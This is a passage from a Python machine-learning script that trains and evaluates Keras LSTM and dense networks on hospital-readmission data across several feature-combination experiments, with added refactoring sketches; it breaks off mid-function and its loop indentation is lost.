Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
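# sample_weight_mode='temporal' makes the weights per-timestep, so the zero
# weights assigned to dummy visits (W_classA=0) mask padded timesteps out of
# the loss.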
# print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.3, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
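# Editorial sketch, not in the original script: the experiment blocks below
# repeat the same model definitions with different node counts and with or
# without the LSTM layer; a single builder like this could replace them.
def build_model(nn_nodes, use_lstm, n_features):
    m = Sequential()
    if use_lstm:
        m.add(TimeDistributed(Dense(nn_nodes[0], activation='sigmoid'),
                              input_shape=(N_visits, n_features)))
        m.add(LSTM(nn_nodes[1], return_sequences=True))
        for n in nn_nodes[2:]:
            m.add(TimeDistributed(Dense(n, activation='sigmoid')))
        m.compile(loss='binary_crossentropy', optimizer='rmsprop',
                  sample_weight_mode='temporal',
                  metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
    else:
        m.add(Dense(nn_nodes[0], activation='sigmoid', input_dim=n_features))
        for n in nn_nodes[1:]:
            m.add(Dense(n, activation='sigmoid'))
        m.compile(loss='binary_crossentropy', optimizer='rmsprop',
                  metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
    return m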
## Define different experiments
# 1110 - HDF+MDF+LSTM
exp='1110'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
# print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0111 - MDF+LSTM+CA
exp='0111'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0110 - MDF+LSTM
exp='0110'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1011 - HDF+LSTM+CA
exp='1011'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1010 - HDF+LSTM
exp='1010'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1101 - HDF+MDF+CA
exp='1101'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print(model.summary())
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1100 - HDF+MDF
exp='1100'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.3, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1001 - HDF+CA
exp='1001'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1000 - HDF only
exp='1000'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0100 - MDF only
exp='0100'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
    model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 0101 - MDF + CA only
exp='0101'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Training epochs
B_size=32*N_visits # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[6,3,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Visits=np.array(VisitIds)
a,b,c=X.shape
X=X.reshape(a*b,c)
Y=Y.reshape(a*b,1)
Sample_weight=Sample_weight.ravel()
Visits=Visits.reshape(a*N_visits,1)
ind=np.where(Sample_weight==0)
X=np.delete(X,ind,0)
Y=np.delete(Y,ind,0)
Sample_weight=np.delete(Sample_weight,ind,0)
Visits=np.delete(Visits,ind,0)
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
model = Sequential()
model.add(Dense(NN_nodes[0], activation='sigmoid', input_dim=c))
model.add(Dense(NN_nodes[1], activation='sigmoid'))
model.add(Dense(NN_nodes[2], activation='sigmoid'))
    model.compile(loss='binary_crossentropy', optimizer='rmsprop', sample_weight_mode=None, metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.2, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
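# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original experiments): each block above
# repeats the same prepare / train / evaluate cycle with a different feature
# code `exp` and different hyper-parameters. A helper along these lines could
# express one run; it assumes read_data, model_eval, save_print, the custom
# metrics (sensitivity, specificity, ppv, npv), the early-stopping callback
# `es` and N_visits are defined earlier in this script exactly as used above.
def run_experiment(exp, class_weights=(0, 1, 1), nn_nodes=(6, 3, 1),
                   epochs=80, batch_size=None, test_size=0.3, n_iter=10):
    if batch_size is None:
        batch_size = 32 * N_visits
    acc, auc, sens, spec, pr, f1, cost = ({} for _ in range(7))
    X, Y, sample_weight, visit_ids = read_data(exp, N_visits)
    # Map class labels {0: dummy visit, 1: no readmission, 2: readmission}
    # to the requested sample weights in one step (avoids chained relabelling).
    sample_weight = np.select([sample_weight == 0, sample_weight == 1, sample_weight == 2],
                              class_weights).astype(float)
    visits = np.array(visit_ids)
    a, b, c = X.shape
    X, Y = X.reshape(a * b, c), Y.reshape(a * b, 1)
    sample_weight, visits = sample_weight.ravel(), visits.reshape(a * N_visits, 1)
    keep = sample_weight != 0  # drop zero-weight rows (dummy visits when W_classA == 0)
    X, Y, sample_weight, visits = X[keep], Y[keep], sample_weight[keep], visits[keep]
    for i in range(n_iter):
        X_tr, X_te, Y_tr, Y_te, w_tr, w_te, v_tr, v_te = train_test_split(
            X, Y, sample_weight, visits, test_size=test_size, shuffle=True)
        model = Sequential()
        model.add(Dense(nn_nodes[0], activation='sigmoid', input_dim=c))
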